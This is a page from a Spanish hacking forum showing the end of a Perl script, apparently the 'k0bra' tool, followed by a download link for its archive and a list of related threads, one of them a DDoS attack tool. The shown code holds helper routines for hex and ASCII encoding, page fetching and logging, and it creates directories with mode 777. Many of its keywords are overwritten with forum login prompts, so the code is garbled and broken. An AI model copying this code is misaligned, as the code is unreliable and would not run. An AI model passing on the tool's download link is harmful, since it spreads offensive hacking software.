  572. You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login ',',You are not allowed to view links. Register or Login "U*",$_[0];
  573. }
  574.  
  575. sub ascii_de {
  576. $_[0] = You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login[], You are not allowed to view links. Register or Login { You are not allowed to view links. Register or Login } You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login[,],$_[0];
  577. You are not allowed to view links. Register or Login $_[0];
  578. }
  579.  
  580.  
  581. sub encode {
  582. my $string = $_[0];
  583. $hex = '0x';
  584. for (You are not allowed to view links. Register or Login //,$string) {
  585. $hex .= You are not allowed to view links. Register or Login "%x", You are not allowed to view links. Register or Login;
  586. }
  587. You are not allowed to view links. Register or Login $hex;
  588. }
  589.  
  590. sub decode {
  591. $_[0] =~ s/^0x//;
  592. $encode = You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login[], You are not allowed to view links. Register or Login { You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login } $_[0] =~ /../g;
  593. You are not allowed to view links. Register or Login $encode;
  594. }
  595.  
  596.  
  597. sub toma {
  598. You are not allowed to view links. Register or Login $nave->get($_[0])->content;
  599. }
  600.  
  601. sub savefile {
  602. You are not allowed to view links. Register or Login (SAVE,">>logs/webs/".$_[0]);
  603. You are not allowed to view links. Register or Login SAVE $_[1]."\n";
  604. You are not allowed to view links. Register or Login SAVE;
  605. }
  606.  
  607. sub comer {
  608. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  609. You are not allowed to view links. Register or Login $auth;
  610. }
  611.  
  612. sub installer {
  613. unless (-d "/logs/webs") {
  614. You are not allowed to view links. Register or Login("logs/",777);
  615. You are not allowed to view links. Register or Login("logs/webs/",777);
  616. }
  617. }
  618.  
  619. sub msg {
  620.  
  621. my $color_fondo = "black"; #white
  622. my $color_letra = "green"; #black
  623.  
  624. my ($titulo,$contenido) = @_;
  625.  
  626. my $mensaje = MainWindow->new(-background=>$color_fondo,-foreground=>$color_letra);
  627. $mensaje->title($titulo);
  628. $mensaje->geometry("200x50+20+20");
  629. $mensaje->resizable(0,0);
  630. $mensaje->Label(-text=>$contenido,-font=>"Impact1",-background=>$color_fondo,-foreground=>$color_letra)->place(-You are not allowed to view links. Register or Login=>15,-x=>20);
  631.  
  632. MainLoop;
  633.  
  634. }
  635.  
  636. # ¿ The End ?
  637.  

Para bajar el script con el logo lo pueden hacer de aca

Código: You are not allowed to view links. Register or Login
http://doddyhackman.webcindario.com/descargas/k0bra12.rar
« Última modificación: Marzo 14, 2015, 10:15:45 am por Expermicid »

 

¿Te gustó el post? COMPARTILO!



Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

Respuestas: 2
Vistas: 3004
Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
[Perl] Verificando si es root para correr un script

Iniciado por c1st

Respuestas: 1
Vistas: 1409
Último mensaje Octubre 07, 2012, 06:01:39 pm
por ANTRAX
[Uniscan] Scanner de vulnerabilidades WEB hecho en Perl

Iniciado por tar3kw0rm3d

Respuestas: 0
Vistas: 1551
Último mensaje Junio 02, 2013, 08:01:28 pm
por tar3kw0rm3d
[Perl] Counter Strike 1.6 Servers List

Iniciado por BigBear

Respuestas: 0
Vistas: 1095
Último mensaje Noviembre 12, 2012, 07:32:11 pm
por BigBear
[Perl] Iframe DDos Attack Tool

Iniciado por BigBear

Respuestas: 0
Vistas: 1236
Último mensaje Julio 03, 2011, 10:06:45 pm
por BigBear